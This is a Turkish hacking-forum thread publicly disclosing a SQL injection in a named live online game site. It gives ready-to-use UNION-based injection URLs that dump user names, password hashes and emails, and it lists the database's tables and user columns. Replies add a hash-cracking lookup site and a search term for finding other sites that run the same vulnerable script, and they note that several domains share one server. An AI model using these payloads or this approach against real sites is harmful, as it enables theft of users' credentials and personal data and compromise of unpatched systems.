

Frmtr - Efes - Sql Injection
-
Frmtrnin online oyunu olan efes. userler tablolar email list vs hepsi işte ^^
ADRES: efes.frmtr.com
http://efes.frmtr.com/profile_view.php?id=245+and+1=0+union+select+1,2,name,pass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+users-- // user ve pwd list
http://efes.frmtr.com/profile_view.php?id=245+and+1=0+union+select+1,2,name,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+users-- // user ve email list
tables--
a_queue
alliances
buildings
c_queue
chat
chat_s
config
d_queue
factions
forums
map
messages
pacts
posts
reports
t_queue
threads
towns
u_queue
units
users
uup_queue
w_queue
weaponsusers tablosu kolonları--
users
name
pass
email
level
joined
lastVisit
points
ip
description
faction
alliance
sitter
grPath
rank
mute
lang--
whitehat rullz
not : açıklamayacaktım kimse kusura bakmasın fakat adminlerine 1-2 kere mail attım kimse siklemedi sinirlendim :D
not 2: açık tarafımca bulunmuştur :D -
mail list çok sağlammış =)
-
Tamda az önce rainbow tablelerden bahsetmişken yapılıcak iş mi bu :)
-
helal
-
hocam buna girdik sonradan bi sorun olmasın
-
kullandıkları script travian clone scripti.
dolayısıyla piyasada bunu kullanan biçok sitede aynı açık var demektir :D
edit:
scipt adı yanılmıyorsam
Devana
googleda
Devana created by Busuioc Andrei
bunu aratın :)
-
http://gdataonline.com/seekhash.php
Burdan hashların bir çoğunun kırılmış haline ulaşabilirsiniz.
-
hocam tebrikler manyaksın :P
-
edit:
1. chat.frmtr.com
2. efes.frmtr.com
3. forumtr.com.tr
4. oyun.frmtr.comhepsi aynı makinada. Birini götür exploit at hepsini götür ^^
-
daha önce girdim bir sever :D
-
Ba$arılı.